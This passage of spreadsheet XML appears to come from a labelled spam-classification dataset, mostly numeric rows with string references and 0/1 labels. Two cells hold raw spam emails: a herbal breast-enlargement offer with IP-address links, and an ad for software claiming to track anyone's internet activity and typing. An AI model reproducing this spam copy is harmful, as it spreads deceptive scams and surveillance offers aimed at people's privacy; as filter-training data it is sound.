      <c r="B7625" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="C7625" s="1" t="s">
        <v>2186</v>
      </c>
      <c r="D7625" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7626">
      <c r="A7626" s="1">
        <v>7624.0</v>
      </c>
      <c r="B7626" s="1" t="s">
        <v>9385</v>
      </c>
      <c r="C7626" s="1" t="s">
        <v>9386</v>
      </c>
      <c r="D7626" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7627" hidden="1">
      <c r="A7627" s="1">
        <v>7625.0</v>
      </c>
      <c r="B7627" s="1" t="s">
        <v>5808</v>
      </c>
      <c r="C7627" s="1" t="s">
        <v>5809</v>
      </c>
      <c r="D7627" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7628" hidden="1">
      <c r="A7628" s="1">
        <v>7626.0</v>
      </c>
      <c r="B7628" s="1" t="s">
        <v>7668</v>
      </c>
      <c r="C7628" s="1" t="s">
        <v>9387</v>
      </c>
      <c r="D7628" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7629" hidden="1">
      <c r="A7629" s="1">
        <v>7627.0</v>
      </c>
      <c r="B7629" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C7629" s="1" t="s">
        <v>9388</v>
      </c>
      <c r="D7629" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7630">
      <c r="A7630" s="1">
        <v>7628.0</v>
      </c>
      <c r="B7630" s="1" t="s">
        <v>4561</v>
      </c>
      <c r="C7630" s="1" t="s">
        <v>4562</v>
      </c>
      <c r="D7630" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7631">
      <c r="A7631" s="1">
        <v>7629.0</v>
      </c>
      <c r="B7631" s="1" t="s">
        <v>2007</v>
      </c>
      <c r="C7631" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/dws8848/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@spamassassin.taint.org
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D7631" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7632">
      <c r="A7632" s="1">
        <v>7630.0</v>
      </c>
      <c r="B7632" s="1" t="s">
        <v>7466</v>
      </c>
      <c r="C7632" s="1" t="s">
        <v>7467</v>
      </c>
      <c r="D7632" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7633" hidden="1">
      <c r="A7633" s="1">
        <v>7631.0</v>
      </c>
      <c r="B7633" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C7633" s="1" t="s">
        <v>9026</v>
      </c>
      <c r="D7633" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7634" hidden="1">
      <c r="A7634" s="1">
        <v>7632.0</v>
      </c>
      <c r="B7634" s="1" t="s">
        <v>6820</v>
      </c>
      <c r="C7634" s="1" t="s">
        <v>6821</v>
      </c>
      <c r="D7634" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7635" hidden="1">
      <c r="A7635" s="1">
        <v>7633.0</v>
      </c>
      <c r="B7635" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C7635" s="1" t="s">
        <v>8192</v>
      </c>
      <c r="D7635" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7636" hidden="1">
      <c r="A7636" s="1">
        <v>7634.0</v>
      </c>
      <c r="B7636" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C7636" s="1" t="s">
        <v>5898</v>
      </c>
      <c r="D7636" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7637">
      <c r="A7637" s="1">
        <v>7635.0</v>
      </c>
      <c r="B7637" s="1" t="s">
        <v>5062</v>
      </c>
      <c r="C7637" s="1" t="s">
        <v>8934</v>
      </c>
      <c r="D7637" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7638" hidden="1">
      <c r="A7638" s="1">
        <v>7636.0</v>
      </c>
      <c r="B7638" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C7638" s="1" t="s">
        <v>9389</v>
      </c>
      <c r="D7638" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7639" hidden="1">
      <c r="A7639" s="1">
        <v>7637.0</v>
      </c>
      <c r="B7639" s="1" t="s">
        <v>9147</v>
      </c>
      <c r="C7639" s="1" t="s">
        <v>9390</v>
      </c>
      <c r="D7639" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7640" hidden="1">
      <c r="A7640" s="1">
        <v>7638.0</v>
      </c>
      <c r="B7640" s="1" t="s">
        <v>1595</v>
      </c>
      <c r="C7640" s="1" t="s">
        <v>9391</v>
      </c>
      <c r="D7640" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7641">
      <c r="A7641" s="1">
        <v>7639.0</v>
      </c>
      <c r="B7641" s="1" t="s">
        <v>9392</v>
      </c>
      <c r="C7641" s="1" t="s">
        <v>9393</v>
      </c>
      <c r="D7641" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7642">
      <c r="A7642" s="1">
        <v>7640.0</v>
      </c>
      <c r="B7642" s="1" t="s">
        <v>1209</v>
      </c>
      <c r="C7642" s="1" t="s">
        <v>1210</v>
      </c>
      <c r="D7642" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7643" hidden="1">
      <c r="A7643" s="1">
        <v>7641.0</v>
      </c>
      <c r="B7643" s="1" t="s">
        <v>5980</v>
      </c>
      <c r="C7643" s="1" t="s">
        <v>5981</v>
      </c>
      <c r="D7643" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7644" hidden="1">
      <c r="A7644" s="1">
        <v>7642.0</v>
      </c>
      <c r="B7644" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C7644" s="1" t="s">
        <v>5426</v>
      </c>
      <c r="D7644" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7645" hidden="1">
      <c r="A7645" s="1">
        <v>7643.0</v>
      </c>
      <c r="B7645" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="C7645" s="1" t="s">
        <v>1832</v>
      </c>
      <c r="D7645" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7646" hidden="1">
      <c r="A7646" s="1">
        <v>7644.0</v>
      </c>
      <c r="B7646" s="1" t="s">
        <v>4731</v>
      </c>
      <c r="C7646" s="1" t="s">
        <v>4732</v>
      </c>
      <c r="D7646" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7647" hidden="1">
      <c r="A7647" s="1">
        <v>7645.0</v>
      </c>
      <c r="B7647" s="1" t="s">
        <v>975</v>
      </c>
      <c r="C7647" s="1" t="s">
        <v>976</v>
      </c>
      <c r="D7647" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7648" hidden="1">
      <c r="A7648" s="1">
        <v>7646.0</v>
      </c>
      <c r="B7648" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C7648" s="1" t="s">
        <v>1164</v>
      </c>
      <c r="D7648" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7649" hidden="1">
      <c r="A7649" s="1">
        <v>7647.0</v>
      </c>
      <c r="B7649" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C7649" s="1" t="s">
        <v>3077</v>
      </c>
      <c r="D7649" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7650" hidden="1">
      <c r="A7650" s="1">
        <v>7648.0</v>
      </c>
      <c r="B7650" s="1" t="s">
        <v>8250</v>
      </c>
      <c r="C7650" s="1" t="s">
        <v>9394</v>
      </c>
      <c r="D7650" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7651">
      <c r="A7651" s="1">
        <v>7649.0</v>
      </c>
      <c r="B7651" s="1" t="s">
        <v>9395</v>
      </c>
      <c r="C7651" s="1" t="s">
        <v>9396</v>
      </c>
      <c r="D7651" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7652" hidden="1">
      <c r="A7652" s="1">
        <v>7650.0</v>
      </c>
      <c r="B7652" s="1" t="s">
        <v>676</v>
      </c>
      <c r="C7652" s="1" t="s">
        <v>677</v>
      </c>
      <c r="D7652" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7653" hidden="1">
      <c r="A7653" s="1">
        <v>7651.0</v>
      </c>
      <c r="B7653" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C7653" s="1" t="s">
        <v>9397</v>
      </c>
      <c r="D7653" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7654" hidden="1">
      <c r="A7654" s="1">
        <v>7652.0</v>
      </c>
      <c r="B7654" s="1" t="s">
        <v>6921</v>
      </c>
      <c r="C7654" s="1" t="s">
        <v>9268</v>
      </c>
      <c r="D7654" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7655" hidden="1">
      <c r="A7655" s="1">
        <v>7653.0</v>
      </c>
      <c r="B7655" s="1" t="s">
        <v>7430</v>
      </c>
      <c r="C7655" s="1" t="s">
        <v>7431</v>
      </c>
      <c r="D7655" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7656" hidden="1">
      <c r="A7656" s="1">
        <v>7654.0</v>
      </c>
      <c r="B7656" s="1" t="s">
        <v>3692</v>
      </c>
      <c r="C7656" s="1" t="s">
        <v>3693</v>
      </c>
      <c r="D7656" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7657" hidden="1">
      <c r="A7657" s="1">
        <v>7655.0</v>
      </c>
      <c r="B7657" s="1" t="s">
        <v>363</v>
      </c>
      <c r="C7657" s="1" t="s">
        <v>364</v>
      </c>
      <c r="D7657" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7658" hidden="1">
      <c r="A7658" s="1">
        <v>7656.0</v>
      </c>
      <c r="B7658" s="1" t="s">
        <v>6557</v>
      </c>
      <c r="C7658" s="1" t="s">
        <v>6558</v>
      </c>
      <c r="D7658" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7659" hidden="1">
      <c r="A7659" s="1">
        <v>7657.0</v>
      </c>
      <c r="B7659" s="1" t="s">
        <v>5177</v>
      </c>
      <c r="C7659" s="1" t="s">
        <v>5178</v>
      </c>
      <c r="D7659" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7660">
      <c r="A7660" s="1">
        <v>7658.0</v>
      </c>
      <c r="B7660" s="1" t="s">
        <v>8796</v>
      </c>
      <c r="C7660" s="1" t="s">
        <v>8797</v>
      </c>
      <c r="D7660" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7661" hidden="1">
      <c r="A7661" s="1">
        <v>7659.0</v>
      </c>
      <c r="B7661" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C7661" s="1" t="s">
        <v>9398</v>
      </c>
      <c r="D7661" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7662" hidden="1">
      <c r="A7662" s="1">
        <v>7660.0</v>
      </c>
      <c r="B7662" s="1" t="s">
        <v>7114</v>
      </c>
      <c r="C7662" s="1" t="s">
        <v>7115</v>
      </c>
      <c r="D7662" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7663" hidden="1">
      <c r="A7663" s="1">
        <v>7661.0</v>
      </c>
      <c r="B7663" s="1" t="s">
        <v>2225</v>
      </c>
      <c r="C7663" s="1" t="s">
        <v>2226</v>
      </c>
      <c r="D7663" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7664">
      <c r="A7664" s="1">
        <v>7662.0</v>
      </c>
      <c r="B7664" s="1" t="s">
        <v>1783</v>
      </c>
      <c r="C7664" s="1" t="s">
        <v>1784</v>
      </c>
      <c r="D7664" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7665" hidden="1">
      <c r="A7665" s="1">
        <v>7663.0</v>
      </c>
      <c r="B7665" s="1" t="s">
        <v>8045</v>
      </c>
      <c r="C7665" s="1" t="s">
        <v>8046</v>
      </c>
      <c r="D7665" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7666" hidden="1">
      <c r="A7666" s="1">
        <v>7664.0</v>
      </c>
      <c r="B7666" s="1" t="s">
        <v>7575</v>
      </c>
      <c r="C7666" s="1" t="s">
        <v>7576</v>
      </c>
      <c r="D7666" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7667" hidden="1">
      <c r="A7667" s="1">
        <v>7665.0</v>
      </c>
      <c r="B7667" s="1" t="s">
        <v>9399</v>
      </c>
      <c r="C7667" s="1" t="s">
        <v>9400</v>
      </c>
      <c r="D7667" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7668" hidden="1">
      <c r="A7668" s="1">
        <v>7666.0</v>
      </c>
      <c r="B7668" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C7668" s="1" t="s">
        <v>9401</v>
      </c>
      <c r="D7668" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7669" hidden="1">
      <c r="A7669" s="1">
        <v>7667.0</v>
      </c>
      <c r="B7669" s="1" t="s">
        <v>1764</v>
      </c>
      <c r="C7669" s="1" t="s">
        <v>9402</v>
      </c>
      <c r="D7669" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7670" hidden="1">
      <c r="A7670" s="1">
        <v>7668.0</v>
      </c>
      <c r="B7670" s="1" t="s">
        <v>3284</v>
      </c>
      <c r="C7670" s="1" t="s">
        <v>3285</v>
      </c>
      <c r="D7670" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7671" hidden="1">
      <c r="A7671" s="1">
        <v>7669.0</v>
      </c>
      <c r="B7671" s="1" t="s">
        <v>5682</v>
      </c>
      <c r="C7671" s="1" t="s">
        <v>9403</v>
      </c>
      <c r="D7671" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7672">
      <c r="A7672" s="1">
        <v>7670.0</v>
      </c>
      <c r="B7672" s="1" t="s">
        <v>9404</v>
      </c>
      <c r="C7672" s="1" t="s">
        <v>9405</v>
      </c>
      <c r="D7672" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7673">
      <c r="A7673" s="1">
        <v>7671.0</v>
      </c>
      <c r="B7673" s="1" t="s">
        <v>8410</v>
      </c>
      <c r="C7673" s="1" t="s">
        <v>8411</v>
      </c>
      <c r="D7673" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7674" hidden="1">
      <c r="A7674" s="1">
        <v>7672.0</v>
      </c>
      <c r="B7674" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C7674" s="1" t="s">
        <v>9406</v>
      </c>
      <c r="D7674" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7675" hidden="1">
      <c r="A7675" s="1">
        <v>7673.0</v>
      </c>
      <c r="B7675" s="1" t="s">
        <v>811</v>
      </c>
      <c r="C7675" s="1" t="s">
        <v>9407</v>
      </c>
      <c r="D7675" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7676">
      <c r="A7676" s="1">
        <v>7674.0</v>
      </c>
      <c r="B7676" s="1" t="s">
        <v>9408</v>
      </c>
      <c r="C7676" s="1" t="s">
        <v>9409</v>
      </c>
      <c r="D7676" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7677" hidden="1">
      <c r="A7677" s="1">
        <v>7675.0</v>
      </c>
      <c r="B7677" s="1" t="s">
        <v>2591</v>
      </c>
      <c r="C7677" s="1" t="s">
        <v>2592</v>
      </c>
      <c r="D7677" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7678" hidden="1">
      <c r="A7678" s="1">
        <v>7676.0</v>
      </c>
      <c r="B7678" s="1" t="s">
        <v>5923</v>
      </c>
      <c r="C7678" s="1" t="s">
        <v>9410</v>
      </c>
      <c r="D7678" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7679" hidden="1">
      <c r="A7679" s="1">
        <v>7677.0</v>
      </c>
      <c r="B7679" s="1" t="s">
        <v>4389</v>
      </c>
      <c r="C7679" s="1" t="s">
        <v>4390</v>
      </c>
      <c r="D7679" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7680" hidden="1">
      <c r="A7680" s="1">
        <v>7678.0</v>
      </c>
      <c r="B7680" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C7680" s="1" t="s">
        <v>9411</v>
      </c>
      <c r="D7680" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7681" hidden="1">
      <c r="A7681" s="1">
        <v>7679.0</v>
      </c>
      <c r="B7681" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C7681" s="1" t="s">
        <v>362</v>
      </c>
      <c r="D7681" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7682" hidden="1">
      <c r="A7682" s="1">
        <v>7680.0</v>
      </c>
      <c r="B7682" s="1" t="s">
        <v>4005</v>
      </c>
      <c r="C7682" s="1" t="s">
        <v>9412</v>
      </c>
      <c r="D7682" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7683">
      <c r="A7683" s="1">
        <v>7681.0</v>
      </c>
      <c r="B7683" s="1" t="s">
        <v>5881</v>
      </c>
      <c r="C7683" s="1" t="s">
        <v>9413</v>
      </c>
      <c r="D7683" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7684">
      <c r="A7684" s="1">
        <v>7682.0</v>
      </c>
      <c r="B7684" s="1" t="s">
        <v>2820</v>
      </c>
      <c r="C7684" s="1" t="s">
        <v>2821</v>
      </c>
      <c r="D7684" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7685" hidden="1">
      <c r="A7685" s="1">
        <v>7683.0</v>
      </c>
      <c r="B7685" s="1" t="s">
        <v>1190</v>
      </c>
      <c r="C7685" s="1" t="s">
        <v>6592</v>
      </c>
      <c r="D7685" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7686" hidden="1">
      <c r="A7686" s="1">
        <v>7684.0</v>
      </c>
      <c r="B7686" s="1" t="s">
        <v>9414</v>
      </c>
      <c r="C7686" s="1" t="s">
        <v>9415</v>
      </c>
      <c r="D7686" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7687">
      <c r="A7687" s="1">
        <v>7685.0</v>
      </c>
      <c r="B7687" s="1" t="s">
        <v>9416</v>
      </c>
      <c r="C7687" s="1" t="s">
        <v>9417</v>
      </c>
      <c r="D7687" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7688" hidden="1">
      <c r="A7688" s="1">
        <v>7686.0</v>
      </c>
      <c r="B7688" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="C7688" s="1" t="s">
        <v>9418</v>
      </c>
      <c r="D7688" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7689" hidden="1">
      <c r="A7689" s="1">
        <v>7687.0</v>
      </c>
      <c r="B7689" s="1" t="s">
        <v>7468</v>
      </c>
      <c r="C7689" s="1" t="s">
        <v>7469</v>
      </c>
      <c r="D7689" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7690" hidden="1">
      <c r="A7690" s="1">
        <v>7688.0</v>
      </c>
      <c r="B7690" s="1" t="s">
        <v>9419</v>
      </c>
      <c r="C7690" s="1" t="s">
        <v>9420</v>
      </c>
      <c r="D7690" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7691" hidden="1">
      <c r="A7691" s="1">
        <v>7689.0</v>
      </c>
      <c r="B7691" s="1" t="s">
        <v>8034</v>
      </c>
      <c r="C7691" s="1" t="s">
        <v>8035</v>
      </c>
      <c r="D7691" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7692">
      <c r="A7692" s="1">
        <v>7690.0</v>
      </c>
      <c r="B7692" s="1" t="s">
        <v>6009</v>
      </c>
      <c r="C7692" s="1" t="s">
        <v>9421</v>
      </c>
      <c r="D7692" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7693" hidden="1">
      <c r="A7693" s="1">
        <v>7691.0</v>
      </c>
      <c r="B7693" s="1" t="s">
        <v>171</v>
      </c>
      <c r="C7693" s="1" t="s">
        <v>9422</v>
      </c>
      <c r="D7693" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7694" hidden="1">
      <c r="A7694" s="1">
        <v>7692.0</v>
      </c>
      <c r="B7694" s="1" t="s">
        <v>4839</v>
      </c>
      <c r="C7694" s="1" t="s">
        <v>4840</v>
      </c>
      <c r="D7694" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7695" hidden="1">
      <c r="A7695" s="1">
        <v>7693.0</v>
      </c>
      <c r="B7695" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C7695" s="1" t="s">
        <v>3919</v>
      </c>
      <c r="D7695" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7696" hidden="1">
      <c r="A7696" s="1">
        <v>7694.0</v>
      </c>
      <c r="B7696" s="1" t="s">
        <v>6683</v>
      </c>
      <c r="C7696" s="1" t="s">
        <v>6684</v>
      </c>
      <c r="D7696" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7697" hidden="1">
      <c r="A7697" s="1">
        <v>7695.0</v>
      </c>
      <c r="B7697" s="1" t="s">
        <v>1274</v>
      </c>
      <c r="C7697" s="1" t="s">
        <v>7409</v>
      </c>
      <c r="D7697" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7698" hidden="1">
      <c r="A7698" s="1">
        <v>7696.0</v>
      </c>
      <c r="B7698" s="1" t="s">
        <v>9423</v>
      </c>
      <c r="C7698" s="1" t="s">
        <v>9424</v>
      </c>
      <c r="D7698" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7699" hidden="1">
      <c r="A7699" s="1">
        <v>7697.0</v>
      </c>
      <c r="B7699" s="1" t="s">
        <v>6572</v>
      </c>
      <c r="C7699" s="1" t="s">
        <v>9425</v>
      </c>
      <c r="D7699" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7700" hidden="1">
      <c r="A7700" s="1">
        <v>7698.0</v>
      </c>
      <c r="B7700" s="1" t="s">
        <v>9051</v>
      </c>
      <c r="C7700" s="1" t="s">
        <v>9052</v>
      </c>
      <c r="D7700" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7701" hidden="1">
      <c r="A7701" s="1">
        <v>7699.0</v>
      </c>
      <c r="B7701" s="1" t="s">
        <v>1313</v>
      </c>
      <c r="C7701" s="1" t="s">
        <v>9426</v>
      </c>
      <c r="D7701" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7702">
      <c r="A7702" s="1">
        <v>7700.0</v>
      </c>
      <c r="B7702" s="1" t="s">
        <v>922</v>
      </c>
      <c r="C7702" s="3" t="str">
        <f>============================================
 Brand-New VERSION 7.0 Just Released:
 Astounding New Software Lets You Find
 Out Almost ANYTHING about ANYONE...
 =============================================
 Download it right now (no charge card needed):
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://www.freehostaccess.com/freeht/mxi.html"&gt;
 http://www.freehostaccess.com/freeht/mxi.html &lt;/a&gt;
 Discover EVERYTHING you ever wanted to know about:
 your friends
 your family
 your enemies
 your employees
 yourself - Is Someone Using Your Identity?
 even your boss!
 DID YOU KNOW you can search for ANYONE, ANYTIME,
 ANYWHERE, right on the Internet?
 Download this software right now--click here:
 &lt;a href="http://www.freehostaccess.com/freeht/mxi.html"&gt;
 http://www.freehostaccess.com/freeht/mxi.html &lt;/a&gt;
 This mammoth COLLECTION of internet investigative
 tools &amp; research sites will provide you with NEARLY
 400 GIGANTIC SEARCH RESOURCES to locate information on:
 * people you trust
 * screen new tenants or roommates
 * housekeepers
 * current or past employment
 * people you work with
 * license plate number with name and address
 * unlisted phone numbers
 * long lost friends
 Locate e-mails, phone numbers, or addresses:
 o Get a Copy of Your FBI file.
 o Get a Copy of Your Military file.
 o FIND DEBTORS and locate HIDDEN ASSETS.
 o Check CRIMINAL Drug and driving RECORDS.
 o Lookup someone's EMPLOYMENT history.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://www.freehostaccess.com/freeht/mxi.html"&gt;
 http://www.freehostaccess.com/freeht/mxi.html &lt;/a&gt;
 Locate old classmates, missing family
 member, or a LONG LOST LOVE:
 - Do Background Checks on EMPLOYEES before you
   hire them.
 - Investigate your family history, birth, death
   and government records!
 - Discover how UNLISTED phone numbers are located.
 - Check out your new or old LOVE INTEREST.
 - Verify your own CREDIT REPORTS so you can
   correct WRONG information.
 - Track anyone's Internet ACTIVITY; see the sites
   they visit, and what they are typing.
 - Explore SECRET WEB SITES that conventional
   search engines have never found.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://www.freehostaccess.com/freeht/mxi.html"&gt;
 http://www.freehostaccess.com/freeht/mxi.html &lt;/a&gt;
 ==&gt; Discover little-known ways to make UNTRACEABLE
     PHONE CALLS.
 ==&gt; Check ADOPTION records; locate MISSING CHILDREN
     or relatives.
 ==&gt; Dig up information on your FRIENDS, NEIGHBORS,
     or BOSS!
 ==&gt; Discover EMPLOYMENT opportunities from AROUND
     THE WORLD!
 ==&gt; Locate transcripts and COURT ORDERS from all
     50 states.
 ==&gt; CLOAK your EMAIL so your true address can't
     be discovered.
 ==&gt; Find out how much ALIMONY your neighbor is paying.
 ==&gt; Discover how to check your phones for WIRETAPS.
 ==&gt; Or check yourself out, and you will be shocked at
     what you find!!
 These are only a few things you can do, There
 is no limit to the power of this software!!
 To download this software, and have it in less
 than 5 minutes click on the url below to visit
 our website (NEW: No charge card needed!)
 &lt;a href="http://www.freehostaccess.com/freeht/mxi.html"&gt;
 http://www.freehostaccess.com/freeht/mxi.html &lt;/a&gt;
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 &lt;a href="mailto:stp_910_b@list.ru?subject=STOP_MXI910"&gt;
 mailto:stp_910_b@list.ru?subject=STOP_MXI910 &lt;/a&gt;
 Please allow up to 72 hours to take effect.
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
  [KIYs5]
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D7702" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7703" hidden="1">
      <c r="A7703" s="1">
        <v>7701.0</v>
      </c>
      <c r="B7703" s="1" t="s">
        <v>5590</v>
      </c>
      <c r="C7703" s="1" t="s">
        <v>9427</v>
      </c>
      <c r="D7703" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7704">
      <c r="A7704" s="1">
        <v>7702.0</v>
      </c>
      <c r="B7704" s="1" t="s">
        <v>9428</v>
      </c>
      <c r="C7704" s="1" t="s">
        <v>9429</v>
      </c>
      <c r="D7704" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7705" hidden="1">
      <c r="A7705" s="1">
        <v>7703.0</v>
      </c>
      <c r="B7705" s="1" t="s">
        <v>8235</v>
      </c>
      <c r="C7705" s="1" t="s">
        <v>8236</v>
      </c>
      <c r="D7705" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7706">
      <c r="A7706" s="1">
        <v>7704.0</v>
      </c>
      <c r="B7706" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="C7706" s="1" t="s">
        <v>7333</v>
      </c>
      <c r="D7706" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7707">
      <c r="A7707" s="1">
        <v>7705.0</v>
      </c>
      <c r="B7707" s="1" t="s">
        <v>3826</v>
      </c>
      <c r="C7707" s="1" t="s">
        <v>3827</v>
      </c>
      <c r="D7707" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7708">
      <c r="A7708" s="1">
        <v>7706.0</v>
      </c>
      <c r="B7708" s="1" t="s">
        <v>9430</v>
      </c>
      <c r="C7708" s="1" t="s">
        <v>9431</v>
      </c>
      <c r="D7708" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7709" hidden="1">
      <c r="A7709" s="1">
        <v>7707.0</v>
      </c>
      <c r="B7709" s="1" t="s">
        <v>4211</v>
      </c>
      <c r="C7709" s="1" t="s">
        <v>9432</v>
      </c>
      <c r="D7709" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7710">
      <c r="A7710" s="1">
        <v>7708.0</v>
      </c>
      <c r="B7710" s="1" t="s">
        <v>9433</v>
      </c>
      <c r="C7710" s="1" t="s">
        <v>9434</v>
      </c>
      <c r="D7710" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7711" hidden="1">
      <c r="A7711" s="1">
        <v>7709.0</v>
      </c>
      <c r="B7711" s="1" t="s">
        <v>786</v>
      </c>
      <c r="C7711" s="1" t="s">
        <v>9435</v>
      </c>
      <c r="D7711" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7712" hidden="1">
      <c r="A7712" s="1">
        <v>7710.0</v>
      </c>
      <c r="B7712" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C7712" s="1" t="s">
        <v>8365</v>
      </c>
      <c r="D7712" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7713">
      <c r="A7713" s="1">
        <v>7711.0</v>
      </c>
      <c r="B7713" s="1" t="s">
        <v>9436</v>
      </c>
      <c r="C7713" s="1" t="s">
        <v>9437</v>
      </c>
      <c r="D7713" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7714" hidden="1">
      <c r="A7714" s="1">
        <v>7712.0</v>
      </c>
      <c r="B7714" s="1" t="s">
        <v>2146</v>
      </c>
      <c r="C7714" s="1" t="s">
        <v>2147</v>
      </c>
      <c r="D7714" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7715" hidden="1">
      <c r="A7715" s="1">
        <v>7713.0</v>
      </c>
      <c r="B7715" s="1" t="s">
        <v>655</v>
      </c>
      <c r="C7715" s="1" t="s">
        <v>9438</v>
      </c>
